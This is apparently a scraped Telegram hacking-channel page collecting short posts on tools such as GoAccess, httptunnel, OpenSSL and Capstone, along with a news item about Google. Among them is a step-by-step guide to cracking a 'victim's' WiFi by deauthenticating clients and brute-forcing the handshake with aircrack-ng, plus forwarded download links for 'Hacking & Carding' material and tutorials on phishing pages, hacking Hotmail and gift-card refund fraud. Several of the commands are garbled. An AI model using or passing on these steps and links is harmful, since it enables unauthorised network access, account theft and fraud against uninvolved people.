UNDERCODE SECURITY
226 subscribers
295 photos
1.03K files
1.73K links
πŸ¦‘WELCOME IN UNDERCODE TESTING FOR LEARN HACKING | PROGRAMMING | SECURITY & more..

THIS CHANNEL BY :

@UndercodeTesting
UndercodeTesting.com (official)

@iUndercode
iUndercode.com (iOs)

@Dailycve
DailyCve.com


@UndercodeNews
UndercodeNews.com
Download Telegram
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«6𝔬𝓓ⓔ β–„ β–‚ ▁

πŸ¦‘What is Goaccess ? #term

GoAccess is a powerful Apache log analyzer, the program creates interactive reports that can be viewed in any browser. It works on both Linux and Windows. Suitable for general analysis of web server logs, for real-time monitoring of activity, or for analysis of certain aspects of activity or problems

πŸ¦‘The following log formats and values are supported for the --log-format option :

πŸ•³COMBINED - combined journal format,
πŸ•³VCOMBINED - combined log format with a virtual host,
πŸ•³COMMON is a regular log format,
πŸ•³VCOMMON is a regular log format with a virtual host,
πŸ•³W3C is an extended W3C log format,
πŸ•³SQUID - Squid's native log format,
πŸ•³CLOUDFRONT - Amazon CloudFront Web Distribution,
πŸ•³CLOUDSTORAGE - Google Cloud Storage,
πŸ•³AWSELB - Amazon Elastic Load Balancing,
πŸ•³AWSS3 - Amazon Simple Storage Service (S3)

share usβ€οΈπŸ‘πŸ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«6𝔬𝓓ⓔ β–„ β–‚ ▁
Forwarded from Backup Legal Mega
πŸ¦‘Some interesting Termux/Linux #tool

> httptunnel creates a bidirectional virtual data path tunnelled in HTTP
requests. The requests can be sent via an HTTP proxy if so desired.

>This can be useful for users behind restrictive firewalls. If WWW
access is allowed through an HTTP proxy, it's possible to use
httptunnel and, say, telnet or PPP to connect to a computer outside
the firewall.

πŸ„ΈπŸ„½πŸ…‚πŸ…ƒπŸ„°πŸ„»πŸ„»πŸ„ΈπŸ…‚πŸ„°πŸ…ƒπŸ„ΈπŸ„ΎπŸ„½ & πŸ…πŸ…„πŸ„½ :

1️⃣git clone https://github.com/larsbrinkhoff/httptunnel.git

2️⃣cd httptunnel

3️⃣chmod 777 autogen.sh

4️⃣./autogen.sh

5️⃣EXAMPLES

πŸ•³ start httptunnel server:

1) At host REMOTE, start hts like this:
hts -F localhost:23 8888 (set up httptunnel server to listen on port 8888 and forward to localhost:23)

2) start httptunnel client:
At host LOCAL, start htc like this:
htc -F 2323 -P PROXY_ADDRESS:8000 REMOTE_IP:8888 (set up httptunnel client to forward localhost:2323 to REMOTE_IP:8888 via a local proxy at PROXY_ADDRESS:8000)

3) or, if using a buffering HTTP proxy:
htc -F 2323 -P PROXY_ADDRESS:8000 -B 48K REMOTE_IP:8888

4) Now you can do this at host LOCAL:
telnet localhost 2323 (telnet in to REMOTE_IP:8888 via your httptunnel you just configured above on port localhost:2323)
...and you will hopefully get a login prompt from host REMOTE_IP.

πŸ•³Debugging:

5) For debug output, add -Dn to the end of a command, where n is the level of debug output you'd like to see, with 0 meaning no debug messages at all, and 5 being the highest level (verbose).

6) ex: htc -F 10001 -P PROXY_ADDRESS:8000 REMOTE_IP:8888 -D5 will show verbose debug output (level 5 debugging) while setting up an httptunnel client to forward localhost:10001 to REMOTE_IP:8888 via a local proxy at PROXY_ADDRESS:8000

6️⃣Related Docs :

πŸ•³https://sergvergara.files.wordpress.com/2011/04/http_tunnel.pdf - excellent httptunnel tutorial, examples, & info

πŸ•³http://sebsauvage.net/punching/ - another excellent example

πŸ•³https://daniel.haxx.se/docs/sshproxy.html - more useful info

πŸ•³http://neophob.com/2006/10/gnu-httptunnel-v33-windows-binaries/ -

πŸ•³httptunnel Win32 binaries (download here)

πŸ•³Google search for "http tunnel v3.3" - brings up lots of good links to httptunnel (this search seems to work better than searching for "httptunnel" alone since the latter brings up many generic search results or results pertaining to other tools)

enjoyβ€οΈπŸ‘πŸ»
βœ…Topic git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«6𝔬𝓓ⓔ β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«6𝔬𝓓ⓔ β–„ β–‚ ▁

πŸ¦‘Self-tuning VDS / VPS :
#FastTips

> VDS (or VPS, which is the same) - translates as β€œvirtual dedicated server” or β€œvirtual private server”. In simple words, this is a computer on which you can install any operating system, and in this operating system any programs. Another key feature of VDS is the presence of white IP.

> Pentester can use VDS for long scanning, for implementing attacks (as a DNS proxy, phishing web server, VPN server), for long-term information collection (creating a website mirror, working with a large number of sites or data), for anonymity (proxy, VPN server), for the exchange of information (mail server, web server, environments for mutual work and file sharing, hidden Tor services and much more), as a target for attacks (you can install vulnerable applications, vulnerable sites for training skills), for training defense skills and analysis of attacks and the consequences of compromise.

> The material selection currently includes instructions for Arch Linux. In the near future, similar instructions will appear for Debian and Ubuntu. The range of issues addressed will also be greatly expanded.

>Most of the instructions describe the configuration inside VDS, and they are identical no matter where you purchased the server. The exceptions are instructions describing the process of installing the OS and the process of making a DNS record about a domain name. These instructions are made on the example of one Russian hoster (selected for low cost) and one foreign hoster (to be added soon).

enjoyβ€οΈπŸ‘πŸ»
βœ…Topic git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«6𝔬𝓓ⓔ β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«6𝔬𝓓ⓔ β–„ β–‚ ▁

πŸ¦‘Google was sued by the Arizona Attorney General for alleged fraud
#News

> According to foreign media reports, on Wednesday , local time, Google was sued by Arizona Attorney General Mark Brnovich, who accused the search giant of deceiving users and collecting location data from their mobile phones. We know that the vast majority of Google’s revenue comes from its huge advertising business, and the personal information that Google collects when users use its products provides support for it.

> In this regard, Brnovich posted on Twitter that the user was deceived by a false sense of security because Google made the user think that they disabled the location data collection settings, but in fact these settings are still turned on. The lawsuit requires Google to provide damages, but the exact amount is unclear. Brnovich's office also did not respond to requests for comment.

>Google has defended its policy on location data in a statement. Spokesperson Jose Castaneda said: "The Attorney General and the lawyers who charge for litigation seem to have wrongly described our services. We have always built privacy features into our products and provided strong control over location data. We look forward to clarifying the facts. "

#News
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«6𝔬𝓓ⓔ β–„ β–‚ ▁
Forwarded from Backup Legal Mega
πŸ¦‘Hacking & Carding Spanish

https://mega.nz/folder/x3Y3hILb#uIIyryhrMF5bUEGQKc9IqA

πŸ¦‘Udemy The Complete Ethical Hacking Course (6.8 GB).zip

https://mega.nz/file/5qZTlIDJ#dp1V3WtylISzMECwnaZNrqdmRoKzj4Dul0CzLbBvoaY
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘What is OpenSSL and what is it used for ?

OpenSSL is a cryptographic toolkit that implements the Secure Sockets Layer (SSL v2 / v3) and Transport Layer Security (TLS v1) network protocols and their corresponding cryptography standards.

The openssl program is a command-line tool for using various cryptographic functions of the OpenSSL cryptographic library in the console. Main features:

1) Create and manage private keys, public keys and parameters.

2) Public Key Cryptographic Operations

3) Create X.509, CSR, and CRL certificates

4) Message Digest Calculation

5) Encryption and decryption using ciphers

6) Client / Server SSL / TLS Tests

7) S / MIME signed or encrypted mail processing

8) Time stamp requests, generation and validation

share usβ€οΈπŸ‘πŸ»
written by
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«6𝔬𝓓ⓔ β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«6𝔬𝓓ⓔ β–„ β–‚ ▁

πŸ¦‘TERMUX-LINUX 2020
#prohack
Capstone is a disassembly framework with the target of becoming the ultimate disasm engine for binary analysis and reversing in the security community.

πŸ¦‘FEATURES :

Support multiple hardware architectures: ARM, ARM64 (ARMv8), Ethereum VM, M68K, Mips, MOS65XX, PPC, Sparc, SystemZ, TMS320C64X, M680X, XCore and X86 (including X86_64).

Having clean/simple/lightweight/intuitive architecture-neutral API.

Provide details on disassembled instruction (called β€œdecomposer” by others).

Provide semantics of the disassembled instruction, such as list of implicit registers read & written.

Implemented in pure C language, with lightweight bindings for D, Clojure, F#, Common Lisp, Visual Basic, PHP, PowerShell, Emacs, Haskell, Perl, Python, Ruby, C#, NodeJS, Java, GO, C++, OCaml, Lua, Rust, Delphi, Free Pascal & Vala (ready either in main code, or provided externally by the community).

Native support for all popular platforms: Windows, Mac OSX, iOS, Android, Linux, *BSD, Solaris, etc.

Thread-safe by design.

Special support for embedding into firmware or OS kernel.

High performance & suitable for malware analysis (capable of handling various X86 malware tricks).

πŸ„ΈπŸ„½πŸ…‚πŸ…ƒπŸ„°πŸ„»πŸ„»πŸ„ΈπŸ…‚πŸ„°πŸ…ƒπŸ„ΈπŸ„ΎπŸ„½ & πŸ…πŸ…„πŸ„½ :

(1) Compile from source

On *nix (such as MacOSX, Linux, *BSD, Solaris):

- To compile for current platform, run:

$ ./make.sh

- On 64-bit OS, run the command below to cross-compile Capstone for 32-bit binary:

$ ./make.sh nix32



(2) Install Capstone on *nix

To install Capstone, run:

$ sudo ./make.sh install

For FreeBSD/OpenBSD, where sudo is unavailable, run:

$ su; ./make.sh install

Users are then required to enter root password to copy Capstone into machine
system directories.

Afterwards, run ./tests/test* to see the tests disassembling sample code.


NOTE: The core framework installed by "./make.sh install" consist of
following files:

/usr/include/capstone/arm.h
/usr/include/capstone/arm64.h
/usr/include/capstone/capstone.h
/usr/include/capstone/evm.h
/usr/include/capstone/m680x.h
/usr/include/capstone/m68k.h
/usr/include/capstone/mips.h
/usr/include/capstone/mos65xx.h
/usr/include/capstone/platform.h
/usr/include/capstone/ppc.h
/usr/include/capstone/sparc.h
/usr/include/capstone/systemz.h
/usr/include/capstone/tms320c64x.h
/usr/include/capstone/x86.h
/usr/include/capstone/xcore.h
/usr/lib/libcapstone.a
/usr/lib/libcapstone.so (for Linux/*nix), or /usr/lib/libcapstone.dylib (OSX)



(3) Cross-compile for Windows from *nix

To cross-compile for Windows, Linux & gcc-mingw-w64-i686 (and also gcc-mingw-w64-x86-64
for 64-bit binaries) are required.

- To cross-compile Windows 32-bit binary, simply run:

$ ./make.sh cross-win32

- To cross-compile Windows 64-bit binary, run:

$ ./make.sh cross-win64

Resulted files libcapstone.dll, libcapstone.dll.a & tests/test*.exe can then
be used on Windows machine.



(4) Cross-compile for iOS from Mac OSX.

To cross-compile for iOS (iPhone/iPad/iPod), Mac OSX with XCode installed is required.

- To cross-compile for ArmV7 (iPod 4, iPad 1/2/3, iPhone4, iPhone4S), run:
$ ./make.sh ios_armv7

- To cross-compile for ArmV7s (iPad 4, iPhone 5C, iPad mini), run:
$ ./make.sh ios_armv7s

- To cross-compile for Arm64 (iPhone 5S, iPad mini Retina, iPad Air), run:
$ ./make.sh ios_arm64

- To cross-compile for all iDevices (armv7 + armv7s + arm64), run:
$ ./make.sh ios

Resulted files libcapstone.dylib, libcapstone.a & tests/test* can then
be used on iOS devices.



(5) Cross-compile for Android

To cross-compile for Android (smartphone/tablet), Android NDK is required.
NOTE: Only ARM and ARM64 are currently supported.

$ NDK=/android/android-ndk-r10e ./make.sh cross-android arm
or
$ NDK=/android/android-ndk-r10e ./make.sh cross-android arm64

Resulted files libcapstone.so, libcapstone.a & tests/test* can then
be used on Android devices.



(6) Compile on Windows with Cygwin
To compile under Cygwin gcc-mingw-w64-i686 or x86_64-w64-mingw32 run:

- To compile Windows 32-bit binary under Cygwin, run:

$ ./make.sh cygwin-mingw32

- To compile Windows 64-bit binary under Cygwin, run:

$ ./make.sh cygwin-mingw64

Resulted files libcapstone.dll, libcapstone.dll.a & tests/test*.exe can then
be used on Windows machine.



(7) By default, "cc" (default C compiler on the system) is used as compiler.

- To use "clang" compiler instead, run the command below:

$ ./make.sh clang

- To use "gcc" compiler instead, run:

$ ./make.sh gcc



(8) To uninstall Capstone, run the command below:

$ sudo ./make.sh uninstall



(9) Language bindings

So far, Python, Ocaml & Java are supported by bindings in the main code.
Look for the bindings under directory bindings/, and refer to README file
of corresponding languages.

Community also provide bindings for C#, Go, Ruby, NodeJS, C++ & Vala. Links to
these can be found at address http://capstone-engine.org/download.html

Enjoyβ€οΈπŸ‘πŸ»
βœ…2020 git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«6𝔬𝓓ⓔ β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«6𝔬𝓓ⓔ β–„ β–‚ ▁

πŸ¦‘Enjoy friends Most Wanted Tutorials :

βž•Get a FREE Mastercard
βž•Get refunded for your giftcards
βž•Get Things from Ebay for Free by Bull-D
βž•Getting Referrals
βž•Google SEO Secret Guide
βž•Guide to making money online
βž•Guide_-_The_Ultimate_Blackhat_Cash_Machine
βž•Hack Hotmail
βž•Hacking Gmail Guide
βž•Hma CPALEAD Guide
βž•Hman_CPASecrets#1
βž•How To Crack WEP In Linux
βž•How to Get Massive YouTube Traffic
βž•How To Get Passes To Pornsites
βž•How To Hack WEP wifi Passwords
βž•How To Make Mozilla Firefox 30 Times Faster
βž•How To Kick Someone Of A Wireless Network (Must be LAN-Admin)
βž•How to Make $1000's a Week with Torrents & CPA-PPL
βž•How To Make A Phisher For A Website
βž•How to make easy money as an eBay affiliate - Victor V

https://mega.nz/file/tqAWmSKK#sMdx61OVHGAug3__p_LBomRXmjISQ1d915nCt6E8Zag


▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«6𝔬𝓓ⓔ β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«6𝔬𝓓ⓔ β–„ β–‚ ▁

πŸ¦‘Turn Android Device into a Web Server

πŸ„ΈπŸ„½πŸ…‚πŸ…ƒπŸ„°πŸ„»πŸ„»πŸ„ΈπŸ…‚πŸ„°πŸ…ƒπŸ„ΈπŸ„ΎπŸ„½ & πŸ…πŸ…„πŸ„½ :

1️⃣Install & open termux

2️⃣$ pkg install git

3️⃣$ pkg install golang

4️⃣$ export GOPATH=/data/data/com.termux/files/home/go

5️⃣$ go get -u -v github.com/kataras/iris

6️⃣$ cd /data/data/com.termux/files/home/go/src/github.com/kataras/iris/_examples/hello-world

7️⃣$ go run main.go

8️⃣ Open your favorite browser and navigate to http://localhost:8080

Enjoyβ€οΈπŸ‘πŸ»
βœ…2020 git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«6𝔬𝓓ⓔ β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«6𝔬𝓓ⓔ β–„ β–‚ ▁

πŸ¦‘Some Termux Useful commands :


pip install youtube-dl For installing Youtube-dl

Packages install python Installs Python

termux-setup-storage Gives TERMUX access to your file system

mkdir β€˜dir-name For creating directory

cd β€œdir-name” For changing directory

cat β€œfile-name” For reading any file

mv /path/file /path where file is moved For moving files from one path to another.

cp /path/file /path where to copy file For copying files from one path
to other

rm filename.file-extension For removing mentioned file from a certain directory.

ping β€œwebsite URL” Helps verify IP level connectivity

toilet -f mono12 -F gay β€œyour text” Presents text in a specified format.

apt show (app-name) Gives a short but detailed summary on mentioned name of desired app.

apt show (app-name) Installs the desired app

Enjoy β€οΈπŸ‘πŸ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«6𝔬𝓓ⓔ β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«6𝔬𝓓ⓔ β–„ β–‚ ▁

πŸ¦‘How To Hack Wifi Using Termux ?
First connect your wife-adapter to your device :

1️⃣Friends first open Your Gnu Root Debian terminal or root terminal and start the monitor mode by typing these commands :

airmon-ng

airmon-ng start wlan0

2️⃣ Now start the network detecting by typing this command :

airodump-ng wlan0mon
Here you see your target device and stop the detecting by control + z.

3️⃣ Now create one folder and name it cap on your desktop or sd card and also create a password list to brute force the WiFi handshake ,collect the information about victim and create the password list for brute force.

4️⃣Copy victim’s BSSID and also note the target channel CH number and type this command :

airodump-ng -c 6 --bssid00:26:44:AB:C5:C0 -w /root/Desktop/cap/ wlan0mon-w

5️⃣There you must give the cap folder path if your created this cap folder on sdcard then you can give this path : -w /sdcard/cap/ wlan0mon

6️⃣Now open another terminal and disconnect all devices with this command and capture a wifi handshake type same command but use here target bssid :

aireeplay-ng -0 5 -a 00:26:44:AB:C5:C0 -wlan0mon
now stop attack by control+z and close the terminal

7️⃣now paste the password list in your cap folder and also go into the cap folder directory

Now crack with this command :

aircrack-ng -w pass.list 01.cap
8️⃣ this is a brute force attack if any password match to the handshake then it will be cracked.and you get the key (means passwords)

πŸ¦‘Tested On:
> root android
> version 6.0

Enjoy β€οΈπŸ‘πŸ»
powered by Wiki :)
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«6𝔬𝓓ⓔ β–„ β–‚ ▁
Netcat_vs_Cryptcat_–_Remote_Shell_to_Control_Kali_Linux_from_Windows.pdf
2.2 MB
Netcat vs Cryptcat – Remote Shell to Control Kali Linux from Windows machine
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«6𝔬𝓓ⓔ β–„ β–‚ ▁

πŸ¦‘Key and Certificate Formats :
> Private keys and certificates can be stored in various formats, which means that you often have to convert them from one format to another. The most common formats are:

1) Binary (DER) certificate

Contains an X.509 certificate in raw form using DER ASN.1 encoding.

2) ASCII (PEM) certificate (s)

Contains a base64 encoded DER certificate in which ----- BEGIN CERTIFICATE ----- is used as the header, and ----- END CERTIFICATE ----- is used as the footer. Usually found with only one certificate per file, although some programs allow more than one certificate depending on the context. For example, older versions of the Apache web server require that the server certificate be one in one file, and all intermediate certificates in another.

3) Binary (DER) key

Contains the private key in raw form using DER ASN.1 encoding. OpenSSL creates keys in its own traditional (SSLeay) format. There is also an alternative format called PKCS # 8 (defined in RFC 5208), but it is not used widely. OpenSSL can convert to and from PKCS # 8 format using the pkcs8 command .

4) ASCII (PEM) key

Contains a base64 encoded DER key , sometimes with additional metadata (for example, the algorithm used for password protection).

5) PKCS # 7 Certificate

A complex format for transporting signed or encrypted data, defined in RFC 2315. It is usually found with the extensions .p7b and .p7c and can optionally include the entire certificate chain. This format is supported by the keytool Java utility.

6) PKCS # 12 (PFX) key and certificate (s)

A complex format that can store and protect the server key along with the entire certificate chain. Commonly encountered with extensions .p12 and .pfx . This format is commonly used in Microsoft products, but is also used for client certificates. Nowadays, the name PFX is used as a synonym for PKCS # 12, although in the old days, PFX meant a different format (earlier version of PKCS # 12). It is unlikely that you will meet the old version anywhere.

share usβ€οΈπŸ‘πŸ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«6𝔬𝓓ⓔ β–„ β–‚ ▁